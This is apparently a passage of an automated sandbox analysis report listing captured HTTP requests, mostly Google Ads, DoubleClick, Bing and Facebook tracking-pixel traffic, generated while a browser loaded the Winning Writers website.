          Source: global trafficHTTP traffic detected: GET /rb/3H/ortl,cc,nc/4-xJy3tX6bM2BGl5zKioiEcQ1TU.css?bu=A4gCjAKPAg&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960070417&cv=11&fst=1731960070417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960070417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d9Csba-ilmj6ds7GHTZYWWdqBq1QAV103nhy4drbT8Opm-8CH&random=2123541725&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /apc/trans.gif?58491551ead6717ca8953d4619f8959a HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: bx-ring.msedge.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rb/6m/cir3,ortl,cc,nc/Y1hHdDMzCdkZ4SpJczZQB0I54VY.css?bu=M8IKvArICrwKrAu8CrILvAq8CrwKvQu8CsQLvArKC7wK0Au8CtYLvAraCrwK4Aq8CtQKvAq8CqMLvArvCrwK9Qq8CukKvAq8CoULiAu8CrwKoAuOC7wKlAuXC7wKggy8CtwLvAqwDA&or=w HTTP/1.1Accept: */*Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: r.bing.comConnection: Keep-AliveCookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=d05aa824&IPMID=1707317782133
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960070417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d9Csba-ilmj6ds7GHTZYWWdqBq1QAV103nhy4drbT8Opm-8CH&random=2123541725&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960078431&cv=11&fst=1731960078431&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960078431&cv=11&fst=1731960078431&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960078431&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d9wRa5F-xHG4ZCSfrIes94N1vIWoZQoduoVvKqoLu81keGz26&random=2514213896&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960078431&cv=11&fst=1731960078431&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960078431&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d9wRa5F-xHG4ZCSfrIes94N1vIWoZQoduoVvKqoLu81keGz26&random=2514213896&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960086429&cv=11&fst=1731960086429&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960086429&cv=11&fst=1731960086429&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960086429&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dzAsaY3_uG7syJvo5DSB0GM9VuXq_m-GqzCs4xLebaEgckM6Z&random=3226614697&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960086429&cv=11&fst=1731960086429&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960086429&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dzAsaY3_uG7syJvo5DSB0GM9VuXq_m-GqzCs4xLebaEgckM6Z&random=3226614697&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /tr/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960090650&cd[buttonFeatures]=%7B%22classList%22%3A%22button%20active%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22doneBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Done%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Done&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=2&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=188856481728275&ev=SubscribedButtonClick&dl=https%3A%2F%2Fwinningwriters.com%2F&rl=&if=false&ts=1731960090650&cd[buttonFeatures]=%7B%22classList%22%3A%22button%20active%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22doneBtn%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22Done%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22div%22%2C%22type%22%3Anull%7D&cd[buttonText]=Done&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers%22%7D&cd[parameters]=%5B%5D&sw=1280&sh=1024&v=2.9.177&r=stable&ec=2&o=4126&fbp=fb.1.1731960008619.29400145611624610&cs_est=true&ler=empty&cdl=API_unavailable&it=1731960007055&coo=false&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger=navigation-sourceReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
